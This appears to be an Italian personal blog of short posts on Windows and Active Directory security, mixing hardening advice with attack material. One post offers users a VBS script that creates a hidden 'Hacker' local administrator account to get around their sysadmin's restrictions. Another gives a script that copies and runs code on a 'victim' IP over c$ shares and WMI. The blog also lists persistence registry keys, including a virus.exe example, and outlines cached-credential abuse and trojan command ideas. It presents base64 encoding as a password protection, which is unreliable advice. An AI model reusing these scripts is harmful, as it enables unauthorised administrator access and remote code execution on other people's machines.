Manuel Pallotti

https://msdn.microsoft.com/it-it/library/system.environment.specialfolder(v=vs.110).aspx Special folder enumartion...  hacker thinking....

Credential Manager e' una croce e delizia. E in taluni scenari, va limitato nel dominio in quanto presenta la commistione di password personali utente e di dominio. Quello che più potrebbe preoccupare è un laptop con le credenziali salvate, o un attacco mirato al backup delle password salvate. In un contesto di Active Directory ci torna utile questa GPO: https://technet.microsoft.com/en-us/library/jj852185(v=ws.10).aspx che limita i danni del furto alle solo password personali dell'utente ;-)

buona lettura!  https://msdn.microsoft.com/it-it/library/windows/apps/windows.security.credentials.passwordvault.aspx

Partiamo dalla fine del titolo, cosa sono le null session: Sessioni non autenticate verso un dominio Active DIrectory o NT4, non importa quanti DC ci sono, e dove sono.. interroga e Active Directory risponde. Il web e' pieno di codice in merito pertanto eviterò di produrre altra documentazione. Tuttavia ci basti sapere che... ad esempio... se noi lanciamo un "vbs con oggetti ADSI" e chiediamo ad AD i mendri del gruppo di sicurezza DOMAIN ADMINS, state tranquilli che ci risponde anche se siamo loggati come guest!  Hardening:  consiglio di dare un occhiata a questo subset di GPO  https://technet.microsoft.com/en-us/library/jj852184(v=ws.10).aspx

Tornando sull'argomento sniffing, una scelta sensata potrebbe esser quella di scrivere una password che si offusca da sola nella mole di dati, e me ne sovviente una simpatica da utilizzare in congiunta al cambio di identità degli account sensibili: che ne dite di una password : 'http://WWW.GOOGLE.IT/search' :D

In risposta a quanto detto allo sniffing delle password in chiaro, c'e' sempre il consiglio valido di fare encoding base 64, almeno le cose con sono cosi' lampanti: https://gallery.technet.microsoft.com/Encode-and-Decode-a-VB-a480d74c

avete mai provato a piazzare uno sniffer in rete e ascoltare il traffico che indirizzate verso un DC? provatelo e vi passa la voglia di fare almeno le seguenti azioni: - net use x: \\shareserver\c$ /user:nomedominio\administrator password - usare le chiamate IMPERSONATE di WMI - usare VBS e ADSI e ADNT con dei privilegi innalzati - varie ed eventuali perche' passano le password in chiaro! ci sono tra l'altro una marea di software di terze parti delegati alla gestione remota dei server in maniera grafica, per quella fascia di user che non amano powershell e vbs/wmi. Hanno lo stesso problema di sicurezza, e magari memorizzano a modo loro le password. System Center di Microsoft è un attimino più furbo in quanto usa dei client che vanno installati e fanno tunnelling verso la console.

Prendo spunto da questo script VBS: Const wbemImpersonationLevelDelegate = 4 Set objWbemLocator = CreateObject("WbemScripting.SWbemLocator") Set objConnection = objwbemLocator.ConnectServer _     ("WebServer", "root\cimv2", "fabrikam\administrator", _          "password", , "kerberos:WebServer") objConnection.Security_.ImpersonationLevel = wbemImpersonationLevelDelegate Set objSoftware = objConnection.Get("Win32_Product") errReturn = objSoftware.Install("\\atl-dc-02\scripts\1561_lab.msi",,True) quindi focalizzo l'attenzione su questa riga: Set objConnection = objwbemLocator.ConnectServer _     ("WebServer", "root\cimv2", "fabrikam\administrator", _          "password", , "kerberos:WebServer") objConnection.Security_.ImpersonationLevel = wbemImpersonationLevelDelegate che fa? in un contesto di user Cetto LaQ...

come già spiegato in un post precedente, ci sono seri problemi con la security di Active Directory e gli account di Domain Admins usati alla garibaldina. Eppure c'e' la Delegation che e' stata implementata da anni... cos'è? Una delega delle proprietà amministrative ad una singola OU, magari quella dei client di dominio, che ha la surface attack più ampia dato che navigano sul web e ricevono email. Qui la documentazione ufficiale: https://social.technet.microsoft.com/wiki/contents/articles/20292.delegation-of-administration-in-active-directory.aspx

Molti anni fa avevo in progetto lo studio di scrivere un trojan che prendesse i comandi da un dominio internet, copiando delle sezioni di codice dall'html, che sia del codice puro nudo e crudo in vbs, o un cmd da lanciare sull'host infetto. Abbandonai il progetto per una marea di ragioni che non vi sto a spiegare... Ero convinto tra l'altro che i moderni firewall e proxy riuscissero a bloccare il tutto, visto lo stato attuale delle tecnologie promesse sulle brochure. Poi... mi trovai a parlare con dei consulenti di una notissima ditta produttrice di firewall che promettevano il blocco dei troian, virus, botnet, tutto, facendo analisi del protocollo TCP IP anche a livello applicativo e persino su SSL. Posi una domanda mentre lo montavano: 'senti, ma se ho un troian sconosciuto che naviga su una pagina web in automatico identificata tramite ip pubblico che tra l'altro potrebbe esser una adsl casalinga.... quest'aggeggio se ne accorge?' Risposta: 'beh... ...

se ci sono regole che ti permettono di salvare solo file con estensione *.DOC, la scelta più ovvia per mettere al sicuro il nostro bel *.MKV da 16 gb sul costosissimo Storage aziendale ridondato è quella di rinominarlo in DOC! ahò... mi raccomando, non ditelo agli utenti!

... andiamo subito al dunque, si fa cosi: sc.exe create <service name> binPath= "<path eseguibile>" altre info qui: https://technet.microsoft.com/en-us/library/bb490995.aspx

WMI, detto volgarmente Windows Management Istrumentation , e' un set di istruzioni basato sul driver model per la gestione degli host Microsoft. La via più semplice per approcciare a questi oggetti e' il VBS, quindi PowerShell, sempre che non si abbia a disposizione un compilatore. in talune occasioni va utilizzato usando delle query in WQL, molto simile ad ANSI SQL Risulta ovvio che siamo ad un livello molto altro ben lontano dall'asssmbly. Che altro dire? E' divertentissimo da usare su RPC e le migliori documentazioni si trovano sul sito Microsoft: https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx Consiglio di googlare anche sui '4 guys from rolla'

Windows Boot Device Drivers  Registry Keys: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services Windows Auto-start Services & Drivers  Registry Keys: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services RunServicesOnce   Registry Keys: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce RunServices  Registry Keys: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices SHELLVALUE Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify UserInit Key -  HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit =C:\windows\system32\userinit.exe,c:\windows\virus.exe. Registry Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit Shell Value -  R...

Un po tutti si focalizzano nella tipologia di attacco sul password cracking via sniffing, man in the middle, brute force, cached password. Non so se sono il primo ma sto portando avanti uno studio su un attacco alternativo. -Partiamo dalla considerazione che il traffico da un DC dovrebbe esser filtrato permettendo la sola vilsibilità dei siti del dominio microsoft delegati alla distribuzione delle patch o wsus che si voglia. -Nessuno lo fa, ma assumiamo che lo facciano, e non c'e' modo di tirare fuori un bit da un DC. -Assumiamo che ho un troian che riesce a girare con il profilo di Domain Administrator. -Assumiamo di aver un server web IIS visibile al DC con le share amministrative attivate ( c$ ) -Assumiamo che riesca ad avviare un NTBACKUP parametrizzando il comando si rpc e wmi, quindi includendo il system state, e direzionando l'output sul server IIS... -Assumiano che non riesca a farlo, e mi sviluppo un backup ad hoc con questo http://alphavss.codeplex.com/ ...

Attacco from lan 1 Andare sull'Host Windows usato dall'amministratore per gestire Active directoy 2 Verificare che il pc sia in dominio 3 fare logout 4 staccare il cavo di rete 5 chiedere al sistemista di fare logon 6 se riesce ad entrare dal profilo in cache, c'e' in cache la password del domain administrator, e dato che molti usano dei notebook soggetti a scippi e rapine.... hardening? qui  https://technet.microsoft.com/en-us/library/jj852185(v=ws.11).aspx

copiare e salvare in c:\temp\ il seguete script joke.vbs on error resume next Const OverwriteExisting = TRUE myValue = InputBox("IP vittima?") Set objFSO = CreateObject("Scripting.FileSystemObject") objFSO.CopyFile "c:\temp\neo_sorg.vbs" , "\\" & myvalue & "\c$\temp\neo.vbs", OverwriteExisting Set objWMIService = GetObject _     ("winmgmts:\\" & myValue & "\root\cimv2:Win32_Process")   Error = objWMIService.Create("wWake script.exe c:\temp\neo.vbs", null, null, intProcessID) If Error = 0 Then     Wscript.Echo "Notepad was started with a process ID of " _          & intProcessID & "." Else     Wscript.Echo "Notepad could not be started due to error " & _         Error & "." End If copiare e salvare in c:\temp\ il seguente script con il nome neo_sorg.vbs ' Open notepad  Set WshSh...

... sempre su Ramsonware, dopo aver googlato un pò sull'analisi dei processi in memoria, mi sono imbattuto in questo; https://www.codeproject.com/Articles/716227/Csharp-How-to-Scan-a-Process-Memory che fa un dump del di un processo. quindi... l'idea e' ....

Giocando con .Net, Technet, Ramsonware, e tazzina da caffe, ho trovato un po di idee interessanti per un HIDS contro i Ramsonwares. Parto sempre dal concetto che c'e' un processo non autorizzato che ................... il gioco e' fatto! ma si puo fare di piu...

Ho sempre lasciato correre tutti discorsi in merito alla piaga del ramsonwares, da un paio di giorni sto meditando agli scenari di mitigazione di un attacco. Ho googlato un po alla ricerca delle estenzioni file note dei ramsonware, imbattendomi in questo: https://www.file-extensions.org/filetype/extension/name/ransomware-encrypted-files Sappiamo che i ramsonware passando in rassegna le share di un server, crittando i files, e registrandoli con un altra estensione. Il laboratorio a mia disposizione ha un 2016 server, ma 2008 e 2012 vanno bene lo stesso, su cui ho installato il Role File Server, ho creato una share, un utente server con accesso read write, quindi ho definito delle regolette che impedivano la scrittura dei file con le estensioni note di Ramsonware, prese dal link da cui sopra. Funziona!!! ma si puo' fare di meglio oppure esser piu estremi nelle scelte, anche perche' abbiamo un elenco di estenzioni che puo cambiare da un momento all'altro: permett...

partiamo dall'osservazione che uno user smaliziato di dominio, tramite le NULL Session puo' ottenere una marea di  informazioni sulla nostra struttura di dominio (Expoliation gruppy di sicurezza in primis). Con una manciata di codice VBS e notepad. Poi, se si ha fortuna, magari riesce a replicarsi un DNS configurato male. E mi fermo qui. Ho scritto per scherzo un post su un semplice hack di una workstation, ma voglio ribadire il concetto: Un processo avviato in contesto Administrator di Dominio Microsoft, ha pieni poteri su tutte le macchine di dominio. E mi fermo qui. Sistemi di protezione? il manuale di Active Directory  by  Microsoft Technet

Appunti di security volendo analizzare cosa combina un EXE maligno, ci vengono incontro alcune utilty in ambito security, ottime per il reverse enginering di un  attacco Parliamo quindi di Process Monitor (suite Sysinternals di Microsoft). Il funzionamento e' intuitivo, basta selezionare il prcesso in esecuzione per filtrare in tempo reale tutti gli accessi al registry e al file sistem. Quindi c'e' PEbrowser, disassembler off line di un processo, e quindi utiliti per il decoding del compilato cone ILSPY (.net). Spesso e volentieri salta all'occhio l'utilizzo di librerie sensibilio  o percorsi di rete, o percorsi di file, che sono un chiaro indicatore di cosa sta toccando il virus. es. utilizzo di API date dalla dll kl2dll.dll e' il chiaro segnale che ci si e' imbattuti in un keylogger. Oppure: percorsi di rete '\\nome server\' potrebbe esser un ramsonware che passa in rassegna i percorsi di rete. e via dicendo... volendo, anche Sandboxie in ...

carissimo utente, questo post e' dedicato a te, dato che quel fascistone del tuo sistemista di fiducia ti ha dato un account che non ti permette di installare boiate sul tuo pc. E' semplice! seguimi.... 1) controlla che sul case non ci sia un lucchetto, se c'e' un lucchetto per le cancellate, amen, non si puo fare nulla al 90% 2) apri il notepad e copia questo: On Error Resume Next strPassword = "password" Set colAccounts = GetObject("WinNT://127.0.0.1") Set objUser = colAccounts.Create("user", "Hacker") objUser.SetPassword strPassword objUser.SetInfo Set objUser = GetObject("WinNT://127.0.0.1/hacker, user") objUser.SetPassword strPassword objUser.SetInfo 'Add user to Local Administrators Group Set objGroup = GetObject("WinNT://127.0.0.1/Administrators,group") Set objUser = GetObject("WinNT://127.0.0.1/hacker,user") objGroup.Add(objUser.ADsPath) 3) salva con il '...

Ragionavo sui possibili scenari di protezione di una rete microsoft, e focalizzando l'attenzione ai virus ramsonware che tipicamente aggrediscono le share di rete su cui l'utente ha permission in scrittuta. Beh... al di la di tutto, penso che mamma Microsoft ci abbia già dato abbastanza documentazione su windows firewall, c'e' solo da applicarlo con raziocinio magari su una OU di test seguendo il ragionamento che... se sappiamo che internet e' definito 0.0.0.0 sui firewall affinchè il pacchetto venga ruotato se sappiamo quale utente e di quale gruppo AD deve andare sul web se sappiamo che solo INTERNET Explorer ( si presume ) deve andare a spasso sul web abbiamo, nemmeno a farlo a posta Windows Firewall su 7, 8, 10 che puo' esser gestito anche centralmente sui domain controller. Windows Firewall, permette di discriminare le connessioni secondo layer di sicurezza, cioe ip in-out, destinazione, udp/tcp ma anche, e questo ci e' utlile, in base all'u...

Qualcuno sente la necessita di emulare uno storage in ambiente virtualizzato? Se la risposta è si, date un occhiata a HPE StoreVirtual VSA. Lo trovo più 'attinente alla realà' di OpenFiller.